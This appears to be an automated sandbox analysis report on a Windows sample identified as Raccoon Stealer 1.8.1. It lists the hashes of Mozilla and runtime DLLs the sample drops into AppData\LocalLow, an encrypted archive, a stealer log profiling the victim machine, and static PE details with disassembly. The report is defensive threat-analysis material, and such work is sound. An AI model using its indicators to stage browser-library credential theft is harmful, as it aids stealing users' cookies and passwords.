Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\pB4pD1lB4sD3.zip Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\yH9tY9hO9gL5 Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1084
Entropy (8bit):	5.2886724639304905
Encrypted:	false
SSDEEP:	24:m9S+XkuCH/j3eJy6U3NetfMGTBqhKQa72CGik/R8RA2Tvqzh:eS5L3v3NetkKBg7CGik/R0A+0h
MD5:	AA845D677F1B588DC1E35088D7C6E9B1
SHA1:	EABAD2BBDEA867A472AC46C50909932DACBFF13E
SHA-256:	5BFF514CEFCC1696C49B32487A8F84042104F06C574288DFF74A336F2CEC217C
SHA-512:	15438D895AAC8D7F81A6C2E0348F66A7D6DF74835C28D1F50AFD6384DD2188F834142742F30E5A8327D111B3CE6B670B38BE5B844ED8C27B0697EA7E1DF71BE4
Malicious:	false
Preview:	RACCOON STEALER \| 1.8.1...Build compile date: Wed Sep 8 00:01:38 2021...Launched at: 2021.09.28 - 08:25:11 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 1... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: -8 hrs... - IP: 185.189.150.72... - Location: 47.366402, 8.554600 \| Zurich, Zurich, Switzerland (8001)... - ComputerName: 549163... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5436 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Updater (2.8.211.12)....Up

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.729757571355875
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
File size:	448000
MD5:	e283621cd5dea00d95791a88eecda925
SHA1:	c1fca8da67debe3d9d67cf6def926d81c8bb3350
SHA256:	2becdf23ad63dfcb341ee332fa50623f0cf5e4fa5f0c6c854cd4e59ce8be3ce6
SHA512:	631940951d1dd4973ab416238275a932719816103b2f8ef279a6eed4ace923ebefd15a87e792a866034aae28399aeb9af6811aaccbb4f680c178674feccc874e
SSDEEP:	12288:BPJd+0j6UAtiX9FtdA4Jf/5mdS5Mu3RVmBqx:BPa8tdA4ZPLR
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

File Icon


Icon Hash:	e0e4e8beb0c4c8ea

Static PE Info

General
Entrypoint:	0x401b18
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5E8A04AA [Sun Apr 5 16:17:46 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	006a79ea8a61231651632116bf97f2d7

Entrypoint Preview

Instruction
call 00007FD2D0FCF930h
jmp 00007FD2D0FCCD3Dh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [0045D008h+ecx*8]
je 00007FD2D0FCCED5h
inc ecx
cmp ecx, 2Dh
jc 00007FD2D0FCCEB3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FD2D0FCCED0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0045D00Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FD2D0FCF595h
test eax, eax
jne 00007FD2D0FCCEC8h
mov eax, 0045D170h
ret
add eax, 08h
ret
call 00007FD2D0FCF582h
test eax, eax
jne 00007FD2D0FCCEC8h
mov eax, 0045D174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007FD2D0FCCEA7h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FD2D0FCCE47h
pop ecx
mov esi, eax
call 00007FD2D0FCCE81h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
push 0000000Ch
push 0045B5D8h
call 00007FD2D0FCDC4Ch
mov ecx, dword ptr [ebp+08h]
xor edi, edi
cmp ecx, edi
jbe 00007FD2D0FCCEF0h
push FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, dword ptr [ebp+0Ch]
sbb eax, eax
inc eax
jne 00007FD2D0FCCEE1h
call 00007FD2D0FCCE53h
mov dword ptr [eax], 0000000Ch
push edi
push edi
push edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5c1a0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b92c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe3000	0x10bd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x591c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5a480	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
